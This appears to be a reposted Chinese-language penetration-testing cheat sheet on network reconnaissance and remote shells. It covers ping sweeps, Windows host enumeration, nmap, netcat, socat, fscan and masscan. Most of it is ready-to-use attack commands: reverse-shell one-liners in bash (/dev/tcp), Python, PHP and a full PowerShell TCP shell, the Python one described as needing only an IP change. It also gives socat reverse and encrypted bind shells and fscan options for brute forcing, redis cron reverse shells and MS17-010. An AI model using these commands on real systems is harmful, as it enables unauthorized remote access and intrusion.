00 資訊收集的方向

1. 主機存活探測

2. 主機埠開放情況

3. 主機服務探測

4. 主機作業系統探測

5. 網段分布情況

6. 漏洞資訊探測

7. 主機內部資訊搜集 / 域內資訊搜集

01 主機內部資訊收集

作業系統默認 ttl 值

① WINDOWS NT/2000 TTL:128

② WINDOWS 95/98 TTL:32

③ UNIX TTL:255

④ LINUX TTL:64

⑤ WIN7 TTL:64

基于 icmp 協議的主機存活探測

① windows

for /l %i in (1,1,255) do @ ping 192.168.1.%i -w 1 -n 1 | findstr "TTL="

② linux

for i in {1..254};do ping -w 1 -c 1 121.5.144.$i|grep "ttl="|awk '{print $4}'|awk -F ":"

'{print $1}';done

1. 查看網路配置資訊

ipconfig /all

2. 查詢作業系統和版本資訊

systeminfo | findstr /B /C:”OS 名稱 ” /C:”OS 版本 ” ( 如果是英文版的中文切換成英文）

3. 查看安裝的軟體及版本、路徑等

wmic product get name,version ( 可能會很慢 )

4. 查看行程資訊

1-tasklist

2-wmic process list brief

!!!:

wmic(windows management instrumentation command-line) :windows 管理工具命令列

5. 查看用戶資訊

net user

6. 查看本地管理員組

net localgroup administrators

7. 查詢埠串列

netstat -ano

8. 查看補丁串列

1-systeminfo | findstr “KB”

2-wmic qfe get Caption,HotFixID,Description,InstalledOn

9. 查詢共享串列

1-netshare

2-wmic share get name,path,status

10. 查看當前用戶

whoami

02 Nmap的使用

常見埠漏洞

nmap 是一個網路連接端掃描軟體，用來掃描網上電腦開放的網路連接端，

確定哪些服務運行在哪些連接端，并且推斷計算機運行哪個作業系統（這是亦

稱 fingerprinting ），它是網路管理員必用的軟體之一，以及用以評估網路系統

安全，

優點：高效、開源、功能齊全

Banner ：指軟體開發商、軟體名稱、版本、服務型別等資訊，

功能：

§ 1- 存活主機

§ 2- 埠掃描

§ 3- 防火墻偵測

§ 4- 漏洞掃描

§ 5- 作業系統

用法：nmap [掃描型別] [選項] {目標規范}

? 例如：nmap -sSV -F -T4 192.168.37.0/24

? 常用命令：

? -Pn：將所有主機視為聯機-跳過主機發現

-v|-vv：詳細|更詳細程序

? -sS：SYN掃描（隱匿）

? -sV：探測打開的埠以確定服務/版本資訊

? -O：啟用作業系統檢測

? -T <0-5>：設定時序模板（越高越快）T4

? -A：綜合掃描

? -p：埠范圍可以-p-（代表全埠)|-p 0-65535 |-p 80,445,3389

資訊收集（使用腳本）：

-sC ：相當于 --script=defaults

smb-check-vulns.nse smb 服務漏洞探測

nmap --script=smb-check-vulns.nse IP

nmap 腳本存放位置：

/usr/share/nmap/scripts/

auth: 負責處理鑒權證書（繞開鑒權）的腳本

broadcast: 在局域網內探查更多服務開啟狀況，如 dhcp/dns/sqlserver 等服務

brute: 提供暴力破解方式，針對常見的應用如 http/snmp 等

default: 使用 -sC 或 -A 選項掃描時候默認的腳本，提供基本腳本掃描能力

discovery: 對網路進行更多的資訊，如 SMB 列舉、 SNMP 查詢等

dos: 用于進行拒絕服務攻擊

exploit: 利用已知的漏洞入侵系統

external: 利用第三方的資料庫或資源，例如進行 whois 決議

fuzzer: 模糊測驗的腳本，發送例外的包到目標機，探測出潛在漏洞 intrusive: 入侵性的腳本，

此類腳本可能引發對方的 IDS/IPS 的記錄或屏蔽

malware: 探測目標機是否感染了病毒、開啟了后門等資訊

safe: 此類與 intrusive 相反，屬于安全性腳本

version: 負責增強服務與版本掃描（ Version Detection ）功能的腳本

vuln: 負責檢查目標機是否有常見的漏洞（ Vulnerability ），如是否有 MS08_067

03 NC

功能強大的網路工具，在網路工具中有 “ 瑞士軍刀 ” 美譽，其有 Windows

和 Linux 的版本，因為它短小精悍 , 功能實用，被設計為一個簡單、可靠的網路

工具，可通過 TCP 或 UDP 協議傳輸讀寫資料，同時，它還是一個網路應用

Debug 分析器，因為它可以根據需要創建各種不同型別的網路連接，

nc 的作用

（ 1 ）實作任意 TCP/UDP 埠的偵聽， nc 可以作為 server 以 TCP 或 UDP 方式偵

聽指定埠

（ 2 ）埠的掃描， nc 可以作為 client 發起 TCP 或 UDP 連接

（3 ）傳輸檔案

（4 ）網路測速

（5 ）克隆硬碟或磁區

（6 ）反彈服務器 shell

常用命令介紹：

§ -v （

verbose 詳細）：詳細資訊 -z （

zero-I/0 ）：無輸入輸出掃描可用埠掃描

§ -l （

listen 監聽）：監聽

§ -p （

port ）：埠

§ -t （

telnet ）： telnet 方式訪問

§ -e （

exec ）：執行命令 --->

§ 監聽： nc -l -p xx 常用 nc -lvvp xx

§ 反彈 shell ：

埠探測：

§ -vz ：

檔案傳輸：

§ 接收端： nc -lvvp > 檔案名（任意）

§ 發送端： nc IP PORT < 檔案名（存在的）

§ ps ：連接成功則傳輸成功

NC連接shell的其他方式

1.bash -i >& /dev/tcp/ip/port 0>&1

解釋：

bash -i 打開一個互動的 bash

>& 將標準錯誤輸出重定向到標準輸出

/dev/tcp/x.x.x.x/port 意為呼叫 socket, 建立 socket 連接 , 其中 x.x.x.x 為要反彈到的主機 ip ， port 為埠

0>&1 標準輸入重定向到標準輸出，實作你與反彈出來的 shell 的互動

注：

/dev/tcp/ 是 Linux 中的一個特殊設備 , 打開這個檔案就相當于發出了一個 socket 呼叫，建立一個 socket 連接，

讀寫這個檔案就相當于在這個 socket 連接中傳輸資料，同理， Linux 中還存在 /dev/udp/ ，

linux shell 下常用的檔案描述符是：

1. 標準輸入 (stdin) ：代碼為 0 ，使用 < 或 << ；

2. 標準輸出 (stdout) ：代碼為 1 ，使用 > 或 >> ；

3. 標準錯誤輸出 (stderr) ：代碼為 2 ，使用 2> 或 2>> ，

另外由于不同 Linux 發行版之間的差異，該命令在某些系統上可能并不適用，

python 反彈 shell

python -c 'import

socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STRE

AM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);

os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

直接用就好了，改 ip 就行，

php 反彈 shell

php -r '$sock=fsockopen(“IP”,port);exec(“/bin/sh -i <&3 >&3 2>&3”);

powershell:

$client = New-Object System.Net.Sockets.TCPClient('192.168.0.102',4444);

$stream = $client.GetStream();

[byte[]]$bytes = 0..65535|%{0};

while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0)

{

$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);

$sendback = (iex $data 2>&1 | Out-String );

$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';

$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);

$stream.Write($sendbyte,0,$sendbyte.Length);

$stream.Flush();

}

$client.Close();

04 socat

Socat 是一個命令列實用程式，它建立兩個雙向位元組流并在它們之間傳

輸資料，對于滲透測驗，它與 Netcat 類似，但具有其他有用的特性，

創建監聽 :

socat TCP4-LISTEN:port STDOUT

連接 :

socat - TCP4:IP:PORT

!!!: 單純的建立連接需要加 - 和 stdout, 建立標準的輸入輸出流

檔案傳輸 :

傳輸

socat tcp4-listen:port,fork file:filename

!!!:fork 用于創建子行程 , 允許多個連接

接收

socat tcp4:ip:port file:filename,create

!!!:create 用于生成檔案 , 生成檔案及傳輸方向兩邊都行

反向 shell

socat -d -d tcp4-listen:4444 stdout

監聽 shell 反彈

socat tcp4:ip:port exec:/bin/bash

反彈 shell

加密的正向 shell

我們將使用 openssl 應用程式通過以下選項創建自簽名證書：

req ：啟動新的證書簽名請求

-newkey ：生成一個新的私鑰

rsa:2048 ：使用密鑰長度為 2048 位的 RSA 加密，

-nodes ：存盤不帶密碼保護的私鑰

-keyout ：將密鑰保存到檔案

-x509 ：輸出自簽名證書而不是證書請求

-days ：以天為單位設定有效期

-out ：將證書保存到檔案

生成密鑰 ( 公鑰和私鑰 )

openssl req -newkey rsa:2048 -nodes -keyout bind_shell.key -x509 -days 362 -out

bind_shell.crt

把公鑰和私鑰轉為 socat 接收的格式

cat bind_shell.key bind_shell.crt > bind_shell.pem

建立監聽與連接

socat openssl-listen:port,cert=bind_shell.pem,verify=0,fork exec:/bin/bash

!!!:verify=0 --> 禁用 ssl 驗證

socat - openssl:ip:port,verify=0

05 fscan

https://github.com/shadow1ng/fscan

fscan.exe -h 192.168.1.1/24 ( 默認使用全部模塊 )

fscan.exe -h 192.168.1.1/16 (B 段掃描 )

fscan.exe -h 192.168.1.1/24 -np -no -nopoc( 跳過存活檢測、不保存檔案、跳過 web poc 掃描 )

fscan.exe -h 192.168.1.1/24 -rf id_rsa.pub (redis 寫公鑰 )

fscan.exe -h 192.168.1.1/24 -rs 192.168.1.1:6666 (redis 計劃任務反彈 shell)

fscan.exe -h 192.168.1.1/24 -c whoami (ssh 爆破成功后，命令執行 )

fscan.exe -h 192.168.1.1/24 -m ssh -p 2222 ( 指定模塊 ssh 和埠 )

fscan.exe -h 192.168.1.1/24 -pwdf pwd.txt -userf users.txt ( 加載指定檔案的用戶名、密碼來進行爆破 )

fscan.exe -h 192.168.1.1/24 -o /tmp/1.txt ( 指定掃描結果保存路徑 , 默認保存在當前路徑 )

fscan.exe -h 192.168.1.1/8 (A 段的 192.x.x.1 和 192.x.x.254, 方便快速查看網段資訊 )

fscan.exe -h 192.168.1.1/24 -m smb -pwd password (smb 密碼碰撞 )

fscan.exe -h 192.168.1.1/24 -m ms17010 ( 指定模塊 )

fscan.exe -hf ip.txt ( 以檔案匯入 )

fscan.exe -u http://baidu.com -proxy 8080 ( 掃描單個 url, 并設定 http 代理 http://127.0.0.1:8080)

masscan ：被稱為最快的埠掃描器， 6 分鐘可以掃描全網，

--rate:

指定發包速率

--ports:

指定埠

--adapter-ip:

指定發包的 IP 地址

--adapter-port:

指定發包的埠號

--adapter-mac:

指定發包的源 mac

--router-mac:

指定網關的 mac

--exclude:

黑名單 , 不掃描指定的 IP

--wait:

設定發完包后默認 (10s) 的等待時間

06 masscan

# web 常用

masscan 127.0.0.0/24 -p80,161,443,873,2181,3389,6379,7001,8000,8009,8080,9000,9009,9090,9200,9300,10000,50070 > results.txt

# 遠程登錄

masscan 127.0.0.0/24 -p22,23,3389,5632,5800,5900,5901 > results.txt

# 檔案服務

masscan 127.0.0.0/24 -p20,21,445,873,2049 > results.txt

# 資料庫

masscan 127.0.0.0/24 -p1433,1521,3306,4100,5000,5432,5984,6379,11211,27017,27018 > results.txt

# 單埠掃描

masscan 127.0.0.0/24 -p443

# 多埠掃描掃描 80 或 443 埠的 B 類子網

masscan 127.0.0.0/24 -p80,443

# 掃描一系列埠掃描 22 到 25 埠的 B 類子網

masscan 127.0.0.0/24 -p22-25

# 快速掃描

masscan 127.0.0.0/24 -p80,8000-9000 --rate 100000

# 排除目標

masscan 127.0.0.0/24 -p80,8000-9000 --excludefile exclude.txt

# 結果保存

masscan 127.0.0.0/24 -p80,8000-9000 > results.txt

轉載請註明出處，本文鏈接：https://www.uj5u.com/qita/347067.html

標籤：其他

上一篇：cs和msf實作內網橫向移動3

下一篇：入職測驗職場 — 在職第一天...